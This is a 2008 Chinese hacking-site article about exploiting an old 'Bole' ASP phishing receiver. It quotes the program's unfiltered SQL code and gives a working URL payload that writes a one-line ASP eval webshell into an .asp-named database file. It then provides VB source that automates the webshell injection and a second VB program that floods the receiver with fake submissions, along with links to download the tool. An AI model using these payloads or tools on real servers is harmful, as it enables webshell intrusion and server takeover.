·	伯乐asp收信程序漏洞及利	06-07	·	字符集导致的浏览器跨站	06-07
·	Search Engine XSS Worm	06-07	·	亲手打造XP超级文件夹下	06-07
·	2008七款免费杀毒软件权	06-06	·	安全专家详细讲解实战局	06-06
·	科普Solaris系统安全	06-06	·	MySQL Proxy（解决注入的	06-06
·	时光回到过去完美修复损	06-06	·	恶搞XP系统桌面巧妙给高	06-06
·	终点网络提供200-300M免	06-06	·	再谈Windows Vista管理员	06-05
·	NT900提供100M-2G免费全	06-05	·	对某ASC加密网马的破解和	06-04
·	有效防范CC的新思路--CC	06-04	·	Solaris 安全整理	06-04
·	FLASH 0DAY Shellcode位	06-04	·	flash漏洞所用shellcode	06-04
·	phpwind管理权限泄露漏洞	06-04	·	phpwind管理权限泄露漏洞	06-04
·	关于phpwind克隆用户	06-04	·	SQL注入攻击-来自微软安	06-04
·	Windows Server 2008下	06-04	·	免格式化制作移动硬盘恢	06-04
·	Vista磁盘碎片整理亲历记	06-04	·	巧用组策略加固你的操作	06-04
·	RTG(亚洲)网络提供200M/	06-04	·	Vista下上网冲浪与众不同	06-02

[图文]伯乐asp收信程序漏洞及利用程序

荐 ★★★★★

伯乐asp收信程序漏洞及利用程序

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-6-7 11:38:25

发这个也是因为看了asm所写的
原创]新概念收信程序箱子永远不会被黑
http://forum.eviloctal.com/thread-32151-1-1.html
之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧..

伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)
主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..
mibao.asp文件对提交的参数没有任何过滤

以下是引用片段：
if action="put" then 
sql="select * from mibao where u=’"&request("u")&"’" 
set rs=Server.CreateObject("ADODB.RecordSet") 
rs.open sql,conn,1,3 
if rs.eof then 
rs.addnew 
rs("u")=request("u") 
rs("pos")=request("pos") 
rs("p")="等待破解" 
rs.update 
rs.close 

response.write "addok" 
else 
sql="update mibao set pos=’"&request("pos")&"’"&" where u=’"&request("u")&"’" 
conn.execute(sql) 
response.write "updateok" 
end if 
end if


第一行代码处

以下是引用片段：
ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")

提交的数据插进了mibaoaa.asp
asp后缀的数据库文件..未做防下载处理..提交一句话木马..很容易得到webshell

假设箱子地址是
http://127.0.0.1/
就访问
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3

返回 "addok"就说明插马成功
接着
http://127.0.0.1/mibaoaa.asp访问小马..
密码是ad.上传大马拿到webshell

根据此漏洞我用VB写了一个简单的利用程序..

程序VB源码

以下是引用片段：
Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") ’用inet连接网页 
aa = InStr(Inet1.GetHeader, "404") ’判断页头是否包含字符“404”,返回0则不包含，否则返回其位置 
If aa <> 0 Then ’页头中包含404 
MsgBox "木马插入失败！", 48, "失败！" ’则说明该网页不存在 
Else ’如果页头中不包含“404” 
MsgBox "木马插入成功！", 64, "恭喜！" ’说明网页存在 
Command2.Enabled = True 
End If 
End Sub 

Private Sub Command2_Click() 
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then 
MsgBox "已经存在！请不要重复此操作！", 16, "error！" 
Else 
Text2.Text = Text1.Text + "/mibaoaa.asp" 
MsgBox "请使用一句话木马客户段连接！密码ad！", 64, "成功！" 
Text2.Visible = True 
End If 
End Sub 

Private Sub Command3_Click() 
End 
End Sub

程序和动画演示我也一并打包上传了..教程因为是去年做的了..里面一些信息请各位兄弟看后不要再去尝试了..
教程里所写的联系QQ也不要再去加了..那时候因为混口饭吃..卖了几个程序..

现在全部都公开了..

工具+教程下载(2.5 MB)：http://www.05112.com/Soft/200806/6562.html

另外看到贴中有人提到刷信问题..lin.asp也是没怎么过滤的..可以外部提交数据

VB刷信代码

以下是引用片段：
Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) ’用inet连接网页
aa = InStr(Inet1.GetHeader, "404") ’判断页头是否包含字符“404”,返回0则不包含，否则返回其位置
If aa <> 0 Then ’页头中包含404
MsgBox "刷信失败！默认收信页面可能被改名！", 48, "失败！" ’则说明该网页不存在
Else ’如果页头中不包含“404”
MsgBox "刷信成功！请登陆后台查看！", 64, "恭喜！" ’说明网页存在
End If
End Sub

Private Sub Command2_Click()
End
End Sub

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： Search Engine XSS Worm

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

完全解析网页后门和挂马	04-02
真实的网络攻击取证纪实	03-27
利用404错误页面挂马	03-21
解密风暴	03-21
社会工程学在黑客中的应用	01-02
轻轻松松解密各种网页木马	12-21
SA权限无xp_cmdshell时取权限又一	12-14
sqlserver2005中恢复xp_cmdshell	11-10
实现无net.exe和net1.exe添加系统	10-26
用U盘轻松去除XP管理员密码	10-26
教你多种保护措施限用移动硬盘	10-09
bat 延时执行命令	10-09